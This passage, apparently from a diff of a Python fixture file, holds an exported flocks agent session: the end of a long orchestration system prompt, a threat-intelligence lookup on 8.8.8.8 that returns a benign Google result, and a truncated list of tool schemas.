What skills are available to equip the agent with?\n  - MUST FIND skills to use, for: `delegate_task(load_skills=[{skill1}, ...])` MUST PASS SKILL AS DELEGATE TASK PARAMETER.\n3. Can I do it myself for the best result, FOR SURE? REALLY, REALLY, THERE IS NO APPROPRIATE CATEGORIES TO WORK WITH?\n\n**Default Bias: DELEGATE. WORK YOURSELF ONLY WHEN IT IS SUPER SIMPLE.**\n\n### When to Challenge the User\nIf you observe:\n- A design decision that will cause obvious problems\n- An approach that contradicts established patterns in the codebase\n- A request that seems to misunderstand how the existing code works\n\nThen: Raise your concern concisely. Propose an alternative. Ask if they want to proceed anyway.\n\n```\nI notice [observation]. This might cause [problem] because [reason].\nAlternative: [your suggestion].\nShould I proceed with your original request, or try the alternative?\n```\n\n---\n\n## Phase 1 - Codebase Assessment (for Open-ended tasks)\n\nBefore following existing patterns, assess whether they\'re worth following.\n\n### Quick Assessment:\n1. Check config files: linter, formatter, type config\n2. Sample 2-3 similar files for consistency\n3. Note project age signals (dependencies, patterns)\n\n### State Classification:\n\n| State | Signals | Your Behavior |\n|-------|---------|---------------|\n| **Disciplined** | Consistent patterns, configs present, tests exist | Follow existing style strictly |\n| **Transitional** | Mixed patterns, some structure | Ask: "I see X and Y patterns. Which to follow?" |\n| **Legacy/Chaotic** | No consistency, outdated patterns | Propose: "No clear conventions. I suggest [X]. OK?" 
|\n| **Greenfield** | New/empty project | Apply modern best practices |\n\nIMPORTANT: If codebase appears undisciplined, verify before assuming:\n- Different patterns may serve different purposes (intentional)\n- Migration might be in progress\n- You might be looking at the wrong reference files\n\n---\n\n## Phase 2A - Exploration & Research\n\n### Tool & Agent Selection:\n\n| Resource | Cost | When to Use |\n|----------|------|-------------|\n| `grep`, `glob` | FREE | Not Complex, Scope Clear, No Implicit Assumptions |\n| `explore` agent | FREE | Contextual grep for codebases |\n| `librarian` agent | CHEAP | Specialized codebase understanding agent for multi-repository analysis, searching remote codebases, retrieving official documentation, and finding implementation examples using GitHub CLI, Context7, and Web Search |\n| `oracle` agent | EXPENSIVE | Read-only consultation agent |\n| `metis` agent | EXPENSIVE | Pre-planning consultant that analyzes requests to identify hidden intentions, ambiguities, and AI failure points |\n| `momus` agent | EXPENSIVE | Expert reviewer for evaluating work plans against rigorous clarity, verifiability, and completeness standards |\n\n**Default flow**: explore/librarian (background) + tools → oracle (if required)\n\n### Explore Agent = Contextual Grep\n\nUse it as a **peer tool**, not a fallback. Fire liberally.\n\n| Use Direct Tools | Use Explore Agent |\n|------------------|-------------------|\n| You know exactly what to search |  |\n| Single keyword/pattern suffices |  |\n| Known file location |  |\n|  | Multiple search angles needed |\n|  | Unfamiliar module structure |\n|  | Cross-layer pattern discovery |\n\n### Librarian Agent = Reference Grep\n\nSearch **external references** (docs, OSS, web). 
Fire proactively when unfamiliar libraries are involved.\n\n| Contextual Grep (Internal) | Reference Grep (External) |\n|----------------------------|---------------------------|\n| Search OUR codebase | Search EXTERNAL resources |\n| Find patterns in THIS repo | Find examples in OTHER repos |\n| How does our code work? | How does this library work? |\n| Project-specific logic | Official API documentation |\n| | Library best practices & quirks |\n| | OSS implementation examples |\n\n**Trigger phrases** (fire librarian immediately):\n- "How do I use [library]?"\n- "What\'s the best practice for [framework feature]?"\n- "Why does [external dependency] behave this way?"\n- "Find examples of [library] usage"\n- "Working with unfamiliar npm/pip/cargo packages"\n\n### Parallel Execution (DEFAULT behavior)\n\n**Explore/Librarian = Grep, not consultants.\n\n```typescript\n// CORRECT: Always background, always parallel\n// Prompt structure: [CONTEXT: what I\'m doing] + [GOAL: what I\'m trying to achieve] + [QUESTION: what I need to know] + [REQUEST: what to find]\n// Contextual Grep (internal)\ndelegate_task(subagent_type="explore", run_in_background=true, load_skills=[], prompt="I\'m implementing user authentication for our API. I need to understand how auth is currently structured in this codebase. Find existing auth implementations, patterns, and where credentials are validated.")\ndelegate_task(subagent_type="explore", run_in_background=true, load_skills=[], prompt="I\'m adding error handling to the auth flow. I want to follow existing project conventions for consistency. Find how errors are handled elsewhere - patterns, custom error classes, and response formats used.")\n// Reference Grep (external)\ndelegate_task(subagent_type="librarian", run_in_background=true, load_skills=[], prompt="I\'m implementing JWT-based auth and need to ensure security best practices. 
Find official JWT documentation and security recommendations - token expiration, refresh strategies, and common vulnerabilities to avoid.")\ndelegate_task(subagent_type="librarian", run_in_background=true, load_skills=[], prompt="I\'m building Express middleware for auth and want production-quality patterns. Find how established Express apps handle authentication - middleware structure, session management, and error handling examples.")\n// Continue working immediately. Collect with delegate_task when needed.\n\n// WRONG: Sequential or blocking\nresult = delegate_task(..., run_in_background=false)  // Never wait synchronously for explore/librarian\n```\n\n### Background Result Collection:\n1. Launch parallel agents -> receive task_ids\n2. Continue immediate work\n3. When results needed: `delegate_task(task_id="...")`\n4. BEFORE final answer: `delegate_task(all=true)`\n\n### Search Stop Conditions\n\nSTOP searching when:\n- You have enough context to proceed confidently\n- Same information appearing across multiple sources\n- 2 search iterations yielded no new useful data\n- Direct answer found\n\n**DO NOT over-explore. Time is precious.**\n\n---\n\n## Phase 2B - Implementation\n\n### Pre-Implementation:\n1. If task has 2+ steps -> Create todo list IMMEDIATELY, IN SUPER DETAIL. No announcements-just create it.\n2. Mark current task `in_progress` before starting\n3. Mark `completed` as soon as done (don\'t batch) - OBSESSIVELY TRACK YOUR WORK USING TODO TOOLS\n\n### Category + Skills Delegation System\n\n**delegate_task() combines categories and skills for optimal task execution.**\n\n#### Available Categories (Domain-Optimized Models)\n\nEach category is configured with a model optimized for that domain. Read the description to understand when to use it.\n\n| Category | Domain / Best For |\n|----------|-------------------|\n| `visual-engineering` | Frontend, UI/UX, design, styling, animation |\n| `ultrabrain` | Use ONLY for genuinely hard, logic-heavy tasks. 
Give clear goals only, not step-by-step instructions. |\n| `deep` | Goal-oriented autonomous problem-solving. Thorough research before action. For hairy problems requiring deep understanding. |\n| `artistry` | Complex problem-solving with unconventional, creative approaches - beyond standard patterns |\n| `quick` | Trivial tasks - single file changes, typo fixes, simple modifications |\n| `unspecified-low` | Tasks that don\'t fit other categories, low effort required |\n| `unspecified-high` | Tasks that don\'t fit other categories, high effort required |\n| `writing` | Documentation, prose, technical writing |\n\n#### Available Skills (Domain Expertise Injection)\n\nSkills inject specialized instructions into the subagent. Read the description to understand when each skill applies.\n\n| Skill | Expertise Domain |\n|-------|------------------|\n| `workflow-generator` | 根据自然语言描述生成 flocks 内置工作流（workflow |\n| `tool-builder` | Creates a new Flocks tool from user requirements, writes metadata, adds unit tests, and hot-reloads the tool without restarting |\n\n---\n\n### MANDATORY: Category + Skill Selection Protocol\n\n**STEP 1: Select Category**\n- Read each category\'s description\n- Match task requirements to category domain\n- Select the category whose domain BEST fits the task\n\n**STEP 2: Evaluate ALL Skills**\nFor EVERY skill listed above, ask yourself:\n> "Does this skill\'s expertise domain overlap with my task?"\n\n- If YES → INCLUDE in `load_skills=[...]`\n- If NO → You MUST justify why (see below)\n\n**STEP 3: Justify Omissions**\n\nIf you choose NOT to include a skill that MIGHT be relevant, you MUST provide:\n\n```\nSKILL EVALUATION for "[skill-name]":\n- Skill domain: [what the skill description says]\n- Task domain: [what your task is about]\n- Decision: OMIT\n- Reason: [specific explanation of why domains don\'t overlap]\n```\n\n**WHY JUSTIFICATION IS MANDATORY:**\n- Forces you to actually READ skill descriptions\n- Prevents lazy omission of potentially 
useful skills\n- Subagents are STATELESS - they only know what you tell them\n- Missing a relevant skill = suboptimal output\n\n---\n\n### Delegation Pattern\n\n```typescript\ndelegate_task(\n  category="[selected-category]",\n  load_skills=["skill-1", "skill-2"],  // Include ALL relevant skills\n  prompt="..."\n)\n```\n\n**ANTI-PATTERN (will produce poor results):**\n```typescript\ndelegate_task(category="...", load_skills=[], run_in_background=false, prompt="...")  // Empty load_skills without justification\n```\n\n### Delegation Table:\n\n| Domain | Delegate To | Trigger |\n|--------|-------------|---------|\n| Architecture decisions | `oracle` | Multi-system tradeoffs, unfamiliar patterns |\n| Self-review | `oracle` | After completing significant implementation |\n| Hard debugging | `oracle` | After 2+ failed fix attempts |\n| Librarian | `librarian` | Unfamiliar packages / libraries, struggles at weird behaviour (to find existing implementation of opensource) |\n| Explore | `explore` | Find existing codebase structure, patterns and styles |\n| Pre-planning analysis | `metis` | Complex task requiring scope clarification, ambiguous requirements |\n| Plan review | `momus` | Evaluate work plans for clarity, verifiability, and completeness |\n| Quality assurance | `momus` | Catch gaps, ambiguities, and missing context before implementation |\n\n### Delegation Prompt Structure (MANDATORY - ALL 6 sections):\n\nWhen delegating, your prompt MUST include:\n\n```\n1. TASK: Atomic, specific goal (one action per delegation)\n2. EXPECTED OUTCOME: Concrete deliverables with success criteria\n3. REQUIRED TOOLS: Explicit tool whitelist (prevents tool sprawl)\n4. MUST DO: Exhaustive requirements - leave NOTHING implicit\n5. MUST NOT DO: Forbidden actions - anticipate and block rogue behavior\n6. 
CONTEXT: File paths, existing patterns, constraints\n```\n\nAFTER THE WORK YOU DELEGATED SEEMS DONE, ALWAYS VERIFY THE RESULTS AS FOLLOWING:\n- DOES IT WORK AS EXPECTED?\n- DOES IT FOLLOWED THE EXISTING CODEBASE PATTERN?\n- EXPECTED RESULT CAME OUT?\n- DID THE AGENT FOLLOWED "MUST DO" AND "MUST NOT DO" REQUIREMENTS?\n\n**Vague prompts = rejected. Be exhaustive.**\n\n### Session Continuity (MANDATORY)\n\nEvery `delegate_task()` output includes a session_id. **USE IT.**\n\n**ALWAYS continue when:**\n| Scenario | Action |\n|----------|--------|\n| Task failed/incomplete | `session_id="{session_id}", prompt="Fix: {specific error}"` |\n| Follow-up question on result | `session_id="{session_id}", prompt="Also: {question}"` |\n| Multi-turn with same agent | `session_id="{session_id}"` - NEVER start fresh |\n| Verification failed | `session_id="{session_id}", prompt="Failed verification: {error}. Fix."` |\n\n**Why session_id is CRITICAL:**\n- Subagent has FULL conversation context preserved\n- No repeated file reads, exploration, or setup\n- Saves 70%+ tokens on follow-ups\n- Subagent knows what it already tried/learned\n\n```typescript\n// WRONG: Starting fresh loses all context\ndelegate_task(category="quick", load_skills=[], run_in_background=false, prompt="Fix the type error in auth.ts...")\n\n// CORRECT: Resume preserves everything\ndelegate_task(session_id="ses_abc123", prompt="Fix: Type error on line 42")\n```\n\n**After EVERY delegation, STORE the session_id for potential continuation.**\n\n### Code Changes:\n- Match existing patterns (if codebase is disciplined)\n- Propose approach first (if codebase is chaotic)\n- Never suppress type errors with `as any`, `@ts-ignore`, `@ts-expect-error`\n- Never commit unless explicitly requested\n- When refactoring, use various tools to ensure safe refactorings\n- **Bugfix Rule**: Fix minimally. 
NEVER refactor while fixing.\n\n### Verification:\n\nRun `lsp_diagnostics` on changed files at:\n- End of a logical task unit\n- Before marking a todo item complete\n- Before reporting completion to user\n\nIf project has build/test commands, run them at task completion.\n\n### Evidence Requirements (task NOT complete without these):\n\n| Action | Required Evidence |\n|--------|-------------------|\n| File edit | `lsp_diagnostics` clean on changed files |\n| Build command | Exit code 0 |\n| Test run | Pass (or explicit note of pre-existing failures) |\n| Delegation | Agent result received and verified |\n\n**NO EVIDENCE = NOT COMPLETE.**\n\n---\n\n## Phase 2C - Failure Recovery\n\n### When Fixes Fail:\n\n1. Fix root causes, not symptoms\n2. Re-verify after EVERY fix attempt\n3. Never shotgun debug (random changes hoping something works)\n\n### After 3 Consecutive Failures:\n\n1. **STOP** all further edits immediately\n2. **REVERT** to last known working state (git checkout / undo edits)\n3. **DOCUMENT** what was attempted and what failed\n4. **CONSULT** Oracle with full failure context\n5. If Oracle cannot resolve -> **ASK USER** before proceeding\n\n**Never**: Leave code in broken state, continue hoping it\'ll work, delete failing tests to "pass"\n\n---\n\n## Phase 3 - Completion\n\nA task is complete when:\n- [ ] All planned todo items marked done\n- [ ] Diagnostics clean on changed files\n- [ ] Build passes (if applicable)\n- [ ] User\'s original request fully addressed\n\nIf verification fails:\n1. Fix issues caused by your changes\n2. Do NOT fix pre-existing issues unless asked\n3. Report: "Done. 
Note: found N pre-existing lint errors unrelated to my changes."\n\n### Before Delivering Final Answer:\n- Cancel ALL running background tasks: `delegate_task(all=true)`\n- This conserves resources and ensures clean workflow completion\n</Behavior_Instructions>\n\n<Oracle_Usage>\n## Oracle — Read-Only High-IQ Consultant\n\nOracle is a read-only, expensive, high-quality reasoning model for debugging and architecture. Consultation only.\n\n### WHEN to Consult:\n\n| Trigger | Action |\n|---------|--------|\n| Complex architecture design | Oracle FIRST, then implement |\n| After completing significant work | Oracle FIRST, then implement |\n| 2+ failed fix attempts | Oracle FIRST, then implement |\n| Unfamiliar code patterns | Oracle FIRST, then implement |\n| Security/performance concerns | Oracle FIRST, then implement |\n| Multi-system tradeoffs | Oracle FIRST, then implement |\n\n### WHEN NOT to Consult:\n\n- Simple file operations (use direct tools)\n- First attempt at any fix (try yourself first)\n- Questions answerable from code you\'ve read\n- Trivial decisions (variable names, formatting)\n- Things you can infer from existing code patterns\n\n### Usage Pattern:\nBriefly announce "Consulting Oracle for [reason]" before invocation.\n\n**Exception**: This is the ONLY case where you announce before acting. For all other work, start immediately without status updates.\n</Oracle_Usage>\n\n<Task_Management>\n## Todo Management (CRITICAL)\n\n**DEFAULT BEHAVIOR**: Create todos BEFORE starting any non-trivial task. This is your PRIMARY coordination mechanism.\n\n### When to Create Todos (MANDATORY)\n\n| Trigger | Action |\n|---------|--------|\n| Multi-step task (2+ steps) | ALWAYS create todos first |\n| Uncertain scope | ALWAYS (todos clarify thinking) |\n| User request with multiple items | ALWAYS |\n| Complex single task | Create todos to break down |\n\n### Workflow (NON-NEGOTIABLE)\n\n1. 
**IMMEDIATELY on receiving request**: `todo` to plan atomic steps.\n  - ONLY ADD TODOS TO IMPLEMENT SOMETHING, ONLY WHEN USER WANTS YOU TO IMPLEMENT SOMETHING.\n2. **Before starting each step**: Mark `in_progress` (only ONE at a time)\n3. **After completing each step**: Mark `completed` IMMEDIATELY (NEVER batch)\n4. **If scope changes**: Update todos before proceeding\n\n### Why This Is Non-Negotiable\n\n- **User visibility**: User sees real-time progress, not a black box\n- **Prevents drift**: Todos anchor you to the actual request\n- **Recovery**: If interrupted, todos enable seamless continuation\n- **Accountability**: Each todo = explicit commitment\n\n### Anti-Patterns (BLOCKING)\n\n| Violation | Why It\'s Bad |\n|-----------|--------------|\n| Skipping todos on multi-step tasks | User has no visibility, steps get forgotten |\n| Batch-completing multiple todos | Defeats real-time tracking purpose |\n| Proceeding without marking in_progress | No indication of what you\'re working on |\n| Finishing without completing todos | Task appears incomplete |\n\n**FAILURE TO USE TODOS ON NON-TRIVIAL TASKS = INCOMPLETE WORK.**\n\n### Clarification Protocol (when asking):\n\n```\nI want to make sure I understand correctly.\n\n**What I understood**: [Your interpretation]\n**What I\'m unsure about**: [Specific ambiguity]\n**Options I see**:\n1. [Option A] - [effort/implications]\n2. [Option B] - [effort/implications]\n\n**My recommendation**: [suggestion with reasoning]\n\nShould I proceed with [recommendation], or would you prefer differently?\n```\n</Task_Management>\n\n<Tone_and_Style>\n## Communication Style\n\n### Be Concise\n- Start work immediately. 
No acknowledgments ("I\'m on it", "Let me...", "I\'ll start...")\n- Answer directly without preamble\n- Don\'t summarize what you did unless asked\n- Don\'t explain your code unless asked\n- One word answers are acceptable when appropriate\n\n### No Flattery\nNever start responses with:\n- "Great question!"\n- "That\'s a really good idea!"\n- "Excellent choice!"\n- Any praise of the user\'s input\n\nJust respond directly to the substance.\n\n### No Status Updates\nNever start responses with casual acknowledgments:\n- "Hey I\'m on it..."\n- "I\'m working on this..."\n- "Let me start by..."\n- "I\'ll get to work on..."\n- "I\'m going to..."\n\nJust start working. Use todos for progress tracking-that\'s what they\'re for.\n\n### When User is Wrong\nIf the user\'s approach seems problematic:\n- Don\'t blindly implement it\n- Don\'t lecture or be preachy\n- Concisely state your concern and alternative\n- Ask if they want to proceed anyway\n\n### Match User\'s Style\n- If user is terse, be terse\n- If user wants detail, provide detail\n- Adapt to their communication preference\n</Tone_and_Style>\n\n<Constraints>\n## Hard Blocks (NEVER violate)\n\n| Constraint | No Exceptions |\n|------------|---------------|\n| Type error suppression (`as any`, `@ts-ignore`) | Never |\n| Commit without explicit request | Never |\n| Speculate about unread code | Never |\n| Leave code in broken state after failures | Never |\n\n## Anti-Patterns (BLOCKING violations)\n\n| Category | Forbidden |\n|----------|-----------|\n| **Type Safety** | `as any`, `@ts-ignore`, `@ts-expect-error` |\n| **Error Handling** | Empty catch blocks `catch(e) {}` |\n| **Testing** | Deleting failing tests to "pass" |\n| **Search** | Firing agents for single-line typos or obvious syntax errors |\n| **Debugging** | Shotgun debugging, random changes |\n\n## Soft Guidelines\n\n- Prefer existing libraries over new dependencies\n- Prefer small, focused changes over large refactors\n- When uncertain about scope, 
ask\n</Constraints>\n\n\n\nYou have access to tools to help accomplish tasks. When you need to:\n- Read files: use the \'read\' tool\n- Write files: use the \'write\' tool  \n- Edit files: use the \'edit\' tool\n- Run commands: use the \'bash\' tool\n- Search code: use the \'grep\' tool\n- List files: use the \'list\' or \'glob\' tool\n\nIMPORTANT RULES:\n- Call each tool ONLY ONCE per request unless explicitly asked to retry\n- NEVER call the same tool multiple times with identical parameters in a single response\n- After calling a tool, wait for its result before proceeding\n- After receiving a tool result, respond to the user with a direct answer\n- Do not repeat tool calls just to explain what you\'re doing - call the tool once and explain after\n\n\nTool results are already available in the conversation history. You MUST continue with your current task using these results. Avoid repeating the same tool calls unless necessary. If additional tool calls are required to complete the task, you may call them.'}, {'role': 'user', 'content': '查一下8.8.8.8的情报'}, {'role': 'assistant', 'content': '\n\n[Tool Call: threatbook_ip_query]\nInput: {\'ip\': \'8.8.8.8\', \'lang\': \'zh\'}\nOutput: {\n  "ip": "8.8.8.8",\n  "severity": "无威胁",\n  "judgments": [\n    "白名单",\n    "CDN服务器",\n    "网关"\n  ],\n  "tags_classes": [\n    {\n      "tags": [\n        "谷歌云主机"\n      ],\n      "tags_type": "公共信息"\n    }\n  ],\n  "basic": {\n    "carrier": "谷歌公司",\n    "location": {\n      "country": "美国",\n      "province": "",\n      "city": "",\n      "lng": "-101.407912",\n      "lat": "39.765054",\n      "country_code": "US"\n    }\n  },\n  "location": "",\n  "asn": {\n    "rank": 4,\n    "info": "GOOGLE",\n    "number": 15169\n  }\n}'}, {'role': 'user', 'content': '<system-reminder>Please continue with the task. If there were any errors or issues with tool calls, try a different approach or provide a helpful response to the user.</system-reminder>'}]
 
 # ============================================================================
-# 完整的 Tools 数据 (从 flocks 会话中导出，包含所有 28 个工具)
+# 完整的 Tools 数据 (从 flocks 会话中导出，包含导出的工具)
 # ============================================================================
-TOOLS = [{'type': 'function', 'function': {'name': 'read', 'description': "Reads a file from the local filesystem. You can access any file directly by using this tool.\nAssume this tool is able to read all files on the machine. If the User provides a path to a file assume that path is valid. It is okay to read a file that does not exist; an error will be returned.\n\nUsage:\n- The filePath parameter must be an absolute path, not a relative path\n- By default, it reads up to 2000 lines starting from the beginning of the file\n- You can optionally specify a line offset and limit (especially handy for long files), but it's recommended to read the whole file by not providing these parameters\n- Any lines longer than 2000 characters will be truncated\n- Results are returned using cat -n format, with line numbers starting at 1\n- You have the capability to call multiple tools in a single response. It is always better to speculatively read multiple files as a batch that are potentially useful.\n- If you read a file that exists but has empty contents you will receive a system reminder warning in place of file contents.\n- You can read image files using this tool.", 'parameters': {'type': 'object', 'properties': {'filePath': {'type': 'string', 'description': 'The path to the file to read'}, 'offset': {'type': 'integer', 'description': 'The line number to start reading from (0-based)', 'default': 0}, 'limit': {'type': 'integer', 'description': 'The number of lines to read (defaults to 2000)', 'default': 2000}}, 'required': ['filePath']}}}, {'type': 'function', 'function': {'name': 'write', 'description': "Writes a file to the local filesystem.\n\nUsage:\n- This tool will overwrite the existing file if there is one at the provided path.\n- If this is an existing file, you MUST use the Read tool first to read the file's contents. This tool will fail if you did not read the file first.\n- ALWAYS prefer editing existing files in the codebase. 
NEVER write new files unless explicitly required.\n- NEVER proactively create documentation files (*.md) or README files. Only create documentation files if explicitly requested by the User.\n- Only use emojis if the user explicitly requests it. Avoid writing emojis to files unless asked.", 'parameters': {'type': 'object', 'properties': {'content': {'type': 'string', 'description': 'The content to write to the file'}, 'filePath': {'type': 'string', 'description': 'The absolute path to the file to write (must be absolute, not relative)'}}, 'required': ['content', 'filePath']}}}, {'type': 'function', 'function': {'name': 'edit', 'description': 'Performs exact string replacements in files. \n\nUsage:\n- You must use your `Read` tool at least once in the conversation before editing. This tool will error if you attempt an edit without reading the file. \n- When editing text from Read tool output, ensure you preserve the exact indentation (tabs/spaces) as it appears AFTER the line number prefix. The line number prefix format is: spaces + line number + tab. Everything after that tab is the actual file content to match. Never include any part of the line number prefix in the oldString or newString.\n- ALWAYS prefer editing existing files in the codebase. NEVER write new files unless explicitly required.\n- Only use emojis if the user explicitly requests it. Avoid adding emojis to files unless asked.\n- The edit will FAIL if `oldString` is not found in the file with an error "oldString not found in content".\n- The edit will FAIL if `oldString` is found multiple times in the file with an error "oldString found multiple times and requires more code context to uniquely identify the intended match". Either provide a larger string with more surrounding context to make it unique or use `replaceAll` to change every instance of `oldString`. \n- Use `replaceAll` for replacing and renaming strings across the file. 
This parameter is useful if you want to rename a variable for instance.', 'parameters': {'type': 'object', 'properties': {'filePath': {'type': 'string', 'description': 'The absolute path to the file to modify'}, 'oldString': {'type': 'string', 'description': 'The text to replace'}, 'newString': {'type': 'string', 'description': 'The text to replace it with (must be different from oldString)'}, 'replaceAll': {'type': 'boolean', 'description': 'Replace all occurrences of oldString (default false)', 'default': False}}, 'required': ['filePath', 'oldString', 'newString']}}}, {'type': 'function', 'function': {'name': 'bash', 'description': 'Executes a given bash command in a persistent shell session with optional timeout, ensuring proper handling and security measures.\n\nAll commands run in /Users/chenjie/Library/Mobile Documents/com~apple~CloudDocs/0_work/projects/threatbook/flocks by default. Use the `workdir` parameter if you need to run a command in a different directory. AVOID using `cd <directory> && <command>` patterns - use `workdir` instead.\n\nIMPORTANT: This tool is for terminal operations like git, npm, docker, etc. DO NOT use it for file operations (reading, writing, editing, searching, finding files) - use the specialized tools for this instead.\n\nBefore executing the command, please follow these steps:\n\n1. Directory Verification:\n   - If the command will create new directories or files, first use `ls` to verify the parent directory exists and is the correct location\n   - For example, before running "mkdir foo/bar", first use `ls foo` to check that "foo" exists and is the intended parent directory\n\n2. 
Command Execution:\n   - Always quote file paths that contain spaces with double quotes (e.g., rm "path with spaces/file.txt")\n   - Examples of proper quoting:\n     - mkdir "/Users/name/My Documents" (correct)\n     - mkdir /Users/name/My Documents (incorrect - will fail)\n     - python "/path/with spaces/script.py" (correct)\n     - python /path/with spaces/script.py (incorrect - will fail)\n   - After ensuring proper quoting, execute the command.\n   - Capture the output of the command.\n\nUsage notes:\n  - The command argument is required.\n  - You can specify an optional timeout in milliseconds. If not specified, commands will time out after 120000ms (2 minutes).\n  - It is very helpful if you write a clear, concise description of what this command does in 5-10 words.\n  - If the output exceeds 1000 lines or 102400 bytes, it will be truncated and the full output will be written to a file.\n  - Avoid using Bash with the `find`, `grep`, `cat`, `head`, `tail`, `sed`, `awk`, or `echo` commands. Instead, use the dedicated tools: Glob, Grep, Read, Edit, Write.\n  - When issuing multiple commands:\n    - If the commands are independent and can run in parallel, make multiple Bash tool calls in a single message.\n    - If the commands depend on each other, use a single Bash call with \'&&\' to chain them together.\n    - Use \';\' only when you need to run commands sequentially but don\'t care if earlier commands fail\n  - AVOID using `cd <directory> && <command>`. Use the `workdir` parameter to change directories instead.', 'parameters': {'type': 'object', 'properties': {'command': {'type': 'string', 'description': 'The command to execute'}, 'timeout': {'type': 'integer', 'description': 'Optional timeout in milliseconds', 'default': 120000}, 'workdir': {'type': 'string', 'description': 'The working directory to run the command in. 
Defaults to project directory.'}, 'description': {'type': 'string', 'description': 'Clear, concise description of what this command does in 5-10 words'}}, 'required': ['command']}}}, {'type': 'function', 'function': {'name': 'grep', 'description': '- Fast content search tool that works with any codebase size\n- Searches file contents using regular expressions\n- Supports full regex syntax (eg. "log.*Error", "function\\s+\\w+", etc.)\n- Filter files by pattern with the include parameter (eg. "*.js", "*.{ts,tsx}")\n- Returns file paths and line numbers with at least one match sorted by modification time\n- Use this tool when you need to find files containing specific patterns\n- If you need to identify/count the number of matches within files, use the Bash tool with `rg` (ripgrep) directly. Do NOT use `grep`.\n- When you are doing an open-ended search that may require multiple rounds of globbing and grepping, use the Task tool instead', 'parameters': {'type': 'object', 'properties': {'pattern': {'type': 'string', 'description': 'The regex pattern to search for in file contents'}, 'path': {'type': 'string', 'description': 'The directory to search in. Defaults to the current working directory.'}, 'include': {'type': 'string', 'description': 'File pattern to include in the search (e.g. "*.js", "*.{ts,tsx}")'}}, 'required': ['pattern']}}}, {'type': 'function', 'function': {'name': 'glob', 'description': '- Fast file pattern matching tool that works with any codebase size\n- Supports glob patterns like "**/*.js" or "src/**/*.ts"\n- Returns matching file paths sorted by modification time\n- Use this tool when you need to find files by name patterns\n- When you are doing an open-ended search that may require multiple rounds of globbing and grepping, use the Task tool instead\n- You have the capability to call multiple tools in a single response. 
It is always better to speculatively perform multiple searches as a batch that are potentially useful.', 'parameters': {'type': 'object', 'properties': {'pattern': {'type': 'string', 'description': 'The glob pattern to match files against'}, 'path': {'type': 'string', 'description': 'The directory to search in. If not specified, the current working directory will be used. IMPORTANT: Omit this field to use the default directory. DO NOT enter "undefined" or "null" - simply omit it for the default behavior.'}}, 'required': ['pattern']}}}, {'type': 'function', 'function': {'name': 'list', 'description': 'Lists files and directories in a given path. The path parameter must be absolute; omit it to use the current workspace directory. You can optionally provide an array of glob patterns to ignore with the ignore parameter. You should generally prefer the Glob and Grep tools, if you know which directories to search.', 'parameters': {'type': 'object', 'properties': {'path': {'type': 'string', 'description': 'The absolute path to the directory to list (must be absolute, not relative)'}, 'ignore': {'type': 'array', 'description': 'List of glob patterns to ignore', 'items': {'type': 'string'}}}}}}, {'type': 'function', 'function': {'name': 'webfetch', 'description': 'Fetch content from a specified URL and return its contents in a readable format.\n\nUsage:\n- The URL must be a fully-formed, valid URL starting with http:// or https://\n- By default, returns content in markdown format (HTML is converted)\n- Supports text, markdown, and html output formats\n- Has a default timeout of 30 seconds (configurable up to 120 seconds)\n- Response size is limited to 5MB', 'parameters': {'type': 'object', 'properties': {'url': {'type': 'string', 'description': 'The URL to fetch content from'}, 'format': {'type': 'string', 'description': 'The format to return content in (text, markdown, or html). 
Defaults to markdown.', 'default': 'markdown', 'enum': ['text', 'markdown', 'html']}, 'timeout': {'type': 'integer', 'description': 'Optional timeout in seconds (max 120)', 'default': 30}}, 'required': ['url']}}}, {'type': 'function', 'function': {'name': 'todo', 'description': 'Use this tool to read or manage the current todo list.', 'parameters': {'type': 'object', 'properties': {'action': {'type': 'string', 'enum': ['read', 'write']}, 'todos': {'type': 'array', 'items': {'type': 'object'}}}, 'required': ['action']}}}, {'type': 'function', 'function': {'name': 'question', 'description': "Ask the user a question and wait for their response.\n\nUse this tool when you need to:\n- Confirm before making significant changes\n- Get user preference between multiple options\n- Clarify ambiguous instructions\n\nQuestion format:\n- Each question has a text prompt\n- Optional header for context\n- List of options for the user to choose from\n- Options have label and optional description\n\nThe user's answers will be returned for you to continue with.", 'parameters': {'type': 'object', 'properties': {'questions': {'type': 'array', 'items': {'type': 'object', 'properties': {'question': {'type': 'string', 'description': 'Question text prompt'}, 'header': {'type': 'string', 'description': 'Optional header/context for the question'}, 'options': {'type': 'array', 'description': 'Options for the user to select', 'items': {'anyOf': [{'type': 'string'}, {'type': 'object', 'properties': {'label': {'type': 'string'}, 'description': {'type': 'string'}}, 'required': ['label'], 'additionalProperties': False}]}}}, 'required': ['question'], 'additionalProperties': True}, 'description': 'Array of questions to ask the user'}}, 'required': ['questions']}}}, {'type': 'function', 'function': {'name': 'task', 'description': 'Launch a new agent to handle complex, multi-step tasks autonomously.\n\nUse this tool when:\n- The task requires multiple steps or research\n- You need to explore code in 
parallel\n- The task can be delegated to a specialized agent\n\nAvailable subagent types:\n- general: General-purpose agent for multi-step tasks\n- explore: Fast code exploration agent for quick searches\n- review: Code review agent (if available)\n\nUsage notes:\n- Provide a clear description (3-5 words)\n- Provide detailed prompt with context\n- The subagent runs autonomously and returns results\n- Use for tasks that can be parallelized', 'parameters': {'type': 'object', 'properties': {'description': {'type': 'string', 'description': 'A short (3-5 words) description of the task'}, 'prompt': {'type': 'string', 'description': 'The task for the agent to perform'}, 'subagent_type': {'type': 'string', 'description': 'The type of specialized agent to use (general, explore, review)', 'enum': ['general', 'explore', 'review']}, 'session_id': {'type': 'string', 'description': 'Optional existing session ID to continue'}}, 'required': ['description', 'prompt', 'subagent_type']}}}, {'type': 'function', 'function': {'name': 'batch', 'description': 'Execute multiple tool calls in parallel for optimal performance.\n\nUse this tool when:\n- You need to run multiple independent operations\n- Operations don\'t depend on each other\'s results\n- You want to maximize throughput\n\nLimitations:\n- Maximum 25 tool calls per batch\n- Cannot batch the \'batch\' tool itself\n- External tools (MCP) cannot be batched\n\nFormat:\n- tool_calls: Array of {tool: "tool_name", parameters: {...}}', 'parameters': {'type': 'object', 'properties': {'tool_calls': {'type': 'array', 'description': 'Array of tool calls to execute in parallel', 'items': {'type': 'string'}}}, 'required': ['tool_calls']}}}, {'type': 'function', 'function': {'name': 'lsp', 'description': 'Perform LSP (Language Server Protocol) operations for code intelligence.\n\nSupported operations:\n- goToDefinition: Jump to where a symbol is defined\n- findReferences: Find all usages of a symbol\n- hover: Get type/documentation info for 
